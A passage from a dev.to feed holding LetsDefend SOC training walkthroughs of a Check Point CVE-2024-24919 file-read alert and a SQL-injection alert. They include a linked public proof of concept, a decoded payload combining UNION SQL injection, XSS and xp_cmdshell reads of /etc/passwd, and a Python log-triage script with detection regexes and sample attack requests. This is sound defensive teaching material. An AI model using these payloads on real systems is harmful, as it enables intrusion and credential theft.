      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fopxxqgfvkmy0xszm1tsk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fopxxqgfvkmy0xszm1tsk.png" alt="take ownership" width="800" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start with taking ownership of the alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbut2efc1bh77khfctg39.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbut2efc1bh77khfctg39.png" alt="ownership taken" width="776" height="568"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next step is to create a case for starting our investigation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2kc5bq612tnpxjjyzned.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2kc5bq612tnpxjjyzned.png" alt="created case" width="776" height="562"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, we start the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gohx9pb1azp1cdib2hf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gohx9pb1azp1cdib2hf.png" alt="playbook1" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We need to understand why the alert was triggered.&lt;/p&gt;

&lt;p&gt;We start by examining the rule name &lt;code&gt;SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919]&lt;/code&gt; and using OSINT to find out more about the reported CVE.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a50alf0c9g81w5c8vqv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a50alf0c9g81w5c8vqv.png" alt="nvd" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is a screenshot of the NIST National Vulnerability Database (NVD) page for the CVE above.&lt;br&gt;
link: &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2024-24919" rel="noopener noreferrer"&gt;https://nvd.nist.gov/vuln/detail/cve-2024-24919&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Description of the CVE:&lt;br&gt;
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A security fix that mitigates this vulnerability is available. Its base score (severity) is 8.6, which is HIGH.&lt;/p&gt;

&lt;p&gt;From the description of the alert, we know it was "Allowed".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9eve4kczqygrfc6c3sh7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9eve4kczqygrfc6c3sh7.png" alt="collectdata" width="800" height="483"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next step is collecting data to get a better understanding of the communication traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmlog5a36d7jqpsqosvi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmlog5a36d7jqpsqosvi.png" alt="intel" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the screenshot of the Threat Intel tab on LetsDefend after we search for the source IP on it.&lt;/p&gt;

&lt;p&gt;This is what we get after we search for the IP and look at its reputation on VirusTotal:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faqgy3egr9due2gv8euoq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faqgy3egr9due2gv8euoq.png" alt="virustotal description" width="800" height="436"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The geolocation of the IP address is Hong Kong.&lt;br&gt;
We can now mark the traffic as malicious and allowed, with low confidence, since only 2 out of 94 vendors flagged it as malicious.&lt;/p&gt;

&lt;p&gt;Checking the IP's reputation on AbuseIPDB:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F10ypai291ntno214suin.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F10ypai291ntno214suin.png" alt="abuseipdb" width="800" height="424"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Below is what we find on Cisco Talos Intelligence:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpj3cgaktpv4965o5wkqp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpj3cgaktpv4965o5wkqp.png" alt="talosdescription" width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;link: &lt;a href="https://talosintelligence.com/reputation_center/lookup?search=203.160.68.12" rel="noopener noreferrer"&gt;https://talosintelligence.com/reputation_center/lookup?search=203.160.68.12&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step for us is examining the HTTP traffic:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffgnndxgiz02sn1ehmrw0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffgnndxgiz02sn1ehmrw0.png" alt="httptraffic" width="800" height="538"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is a POC for the CVE exploit:&lt;br&gt;
&lt;code&gt;https://github.com/un9nplayer/CVE-2024-24919&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Let's dive into the logs now.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9sf21nmnvku7kihj7dr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9sf21nmnvku7kihj7dr.png" alt="log1" width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It looks like our attacker is attempting to traverse the server's file system to reach sensitive files such as /etc/passwd and /etc/shadow on Unix-based systems, which contain user account information.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fraqpugdnvus9qbnf6y6y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fraqpugdnvus9qbnf6y6y.png" alt="lfi" width="800" height="334"&gt;&lt;/a&gt;&lt;br&gt;
Answer: LFI &amp;amp; RFI&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fln7n39rb816jwp92ubmv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fln7n39rb816jwp92ubmv.png" alt="plan" width="800" height="494"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we have to check whether this is a planned test.&lt;br&gt;
After checking the Email Security tab and searching for the IP addresses and the hostname, we find no mail notifying us of any planned test. We can conclude it is NOT a planned test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw2cd2shpr9ywfix9czxe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw2cd2shpr9ywfix9czxe.png" alt="intetonetwork" width="800" height="376"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We saw that the source IP is an external IP from Hong Kong,&lt;br&gt;
so the traffic is moving from Internet -&amp;gt; Company Network.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ficc0114t1i15ixelsu98.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ficc0114t1i15ixelsu98.png" alt="checkifsuccefful" width="800" height="655"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The attack was successful.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss47r5681f37lp7l6s09.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss47r5681f37lp7l6s09.png" alt="containment" width="800" height="548"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step for us is to contain the host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomggexftrvswcgbqoafu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomggexftrvswcgbqoafu.png" alt="contained" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Based on what we have uncovered during our investigation, it is wise to contain this server endpoint to prevent further damage.&lt;/p&gt;

&lt;p&gt;Add artifacts:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F18ur7mn5ufcrq2g0wlxl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F18ur7mn5ufcrq2g0wlxl.png" alt="artifacts" width="800" height="606"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2zx453mudta0r9fn2yiy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2zx453mudta0r9fn2yiy.png" alt="escalate" width="800" height="585"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In this case we need Tier 2 escalation.&lt;/p&gt;

&lt;p&gt;After adding the analyst's notes, we finish the playbook and close the alert.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC127 - SQL Injection Detected</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Fri, 24 Apr 2026 16:40:45 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc127-sql-injection-detected-ak</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc127-sql-injection-detected-ak</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8sicehewq6wt2xh14ejj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8sicehewq6wt2xh14ejj.png" alt="alert" width="800" height="306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the screenshot of the alert that we are going to investigate.&lt;/p&gt;

&lt;p&gt;We start by taking ownership of the alert and then head to the investigation channel.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw82secbpe5b0fd9ac1of.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw82secbpe5b0fd9ac1of.png" alt="createcase" width="800" height="387"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we create the case for this alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0v1xki4120swz2wmrn9e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0v1xki4120swz2wmrn9e.png" alt="playbook" width="800" height="246"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next thing for us to do is to start the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw6cyfnbo0ihnaym2nmt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw6cyfnbo0ihnaym2nmt.png" alt="infopage" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F139w2d6m5atbelyghwim.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F139w2d6m5atbelyghwim.png" alt="infopage2" width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo90asyonn89ydf4w0zof.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo90asyonn89ydf4w0zof.png" alt="infopage3" width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next thing I do is copy the URL from the Request URL field and head to &lt;a href="https://gchq.github.io/CyberChef" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt; to &lt;code&gt;URL Decode&lt;/code&gt; it:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuk1afetshq4ru3plqnj9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuk1afetshq4ru3plqnj9.png" alt="cyberchef" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The decoded request looks like a malicious HTTP GET request that combines multiple attacks into one payload:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;SQL Injection (Boolean + Union-Based)&lt;br&gt;
The attacker injects AND 1=1 to confirm the parameter is vulnerable, followed by a UNION ALL SELECT query to extract table_name from information_schema.tables. This aims to enumerate the database schema.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Reflected XSS Payload&lt;br&gt;
The string 'alert(&amp;amp;quot;XSS&amp;amp;quot;)' is injected into the UNION query. If unsanitized in the HTTP response, it will execute JavaScript in the victim's browser — used for session hijacking.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Command Injection via xp_cmdshell&lt;br&gt;
The attacker calls xp_cmdshell('cat ../../../etc/passwd'), a SQL Server stored procedure that runs OS-level commands. This attempts to read the system's password file, indicating privilege escalation or host compromise. (I looked up the use of the command)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Evasion Techniques Observed&lt;br&gt;
The payload uses --/**/ to break the comment without spaces (bypassing naive WAF rules) and a # at the end to terminate the query early. The 200 OK response suggests the server executed at least part of the request.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The HTTP GET request line contains &lt;code&gt;HTTP/1.1 200 865&lt;/code&gt;; here the status code 200 means that the attack was successful.&lt;/p&gt;
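&lt;p&gt;The path traversal request from the SOC287 walkthrough above and the decoded injection request here can be triaged by the same routine. The script below is an added example, not code from the LetsDefend posts: it automates the URL decoding done with CyberChef, tags the indicators the analyst looked for by eye, and pairs them with the response status. The combined-log format, the sample lines and the addresses are constructed for it; the decoder repeats URL decoding so that a double-encoded traversal is not missed.&lt;/p&gt;

```python
"""Triage web access-log requests for the injection indicators seen in the walkthroughs.

Added example, not code from the LetsDefend posts: it automates the manual step
of URL-decoding the Request URL (done with CyberChef above) and tags the
indicators the analyst looked for by eye. The log format and every sample line
are constructed for this example; the addresses are documentation ranges.
"""
import re
from urllib.parse import unquote_plus

# Each indicator carries the attack class the analyst named in the walkthrough.
INDICATORS = [
    ("path_traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("sensitive_file", re.compile(r"/etc/(passwd|shadow)\b")),
    ("sqli_boolean", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("sqli_union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("xss", re.compile(r"\balert\s*\(", re.I)),
    ("cmd_exec", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("comment_evasion", re.compile(r"--/\*\*/|#\s*$")),
]

# Combined log format: client ident user [time] "METHOD URL PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Constructed sample: a benign request, a traversal, a double-encoded traversal that
# was refused, the stacked injection request from the post, and an unparseable line.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2026:10:01:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [24/Apr/2026:10:01:15 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1420
203.0.113.7 - - [24/Apr/2026:10:01:16 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 0
198.51.100.9 - - [24/Apr/2026:10:02:01 +0000] "GET /search.php?id=1%20AND%201%3D1%20UNION%20ALL%20SELECT%20table_name%2C%27alert%28%22XSS%22%29%27%20FROM%20information_schema.tables%20--/**/xp_cmdshell%28%27cat%20../../../etc/passwd%27%29%23 HTTP/1.1" 200 865
this line is not in log format and must be skipped
"""


def fully_decode(url, max_rounds=5):
    """Decode until stable (bounded) so %252e-style double encoding cannot hide a traversal."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def triage_line(line):
    """Parse one log line; returns None if it does not match the format."""
    match = LOG_RE.match(line)
    if match is None:
        return None
    src, when, method, url, status, size = match.groups()
    decoded = fully_decode(url)
    tags = [name for name, pattern in INDICATORS if pattern.search(decoded)]
    # A 2xx with a body means the server answered the request; the playbook treats
    # that as "successful", while a 4xx or empty reply points at a blocked or failed attempt.
    answered = status.startswith("2") and size not in ("0", "-")
    if not tags:
        verdict = "benign"
    elif answered:
        verdict = "malicious-answered"
    else:
        verdict = "malicious-blocked-or-failed"
    return {"src": src, "time": when, "method": method, "decoded_url": decoded,
            "status": status, "size": size, "tags": tags, "verdict": verdict}


def triage_log(text):
    """Triage every line of a log, skipping lines that do not parse instead of failing."""
    return [r for r in (triage_line(line) for line in text.splitlines()) if r is not None]


if __name__ == "__main__":
    for r in triage_log(SAMPLE_LOG):
        print(r["src"], r["status"], r["verdict"], ",".join(r["tags"]))
```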

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsh9ncoiyy33y6h1zwand.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsh9ncoiyy33y6h1zwand.png" alt="httpattack" width="800" height="377"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can conclude that it is malicious.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7y0lo9m74mtawdsnc9nz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7y0lo9m74mtawdsnc9nz.png" alt="attackclass" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can answer this easily; it is in the name of the alert: SQL Injection.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9j5wq659ucuzf4d6j01.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9j5wq659ucuzf4d6j01.png" alt="planned" width="800" height="491"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We go to the Email Security tab, search for the hostnames and IP addresses, and check for any email about a planned test; we find none.&lt;/p&gt;

&lt;p&gt;Next we go to VirusTotal and check the reputation of the Source IP address:&lt;/p&gt;

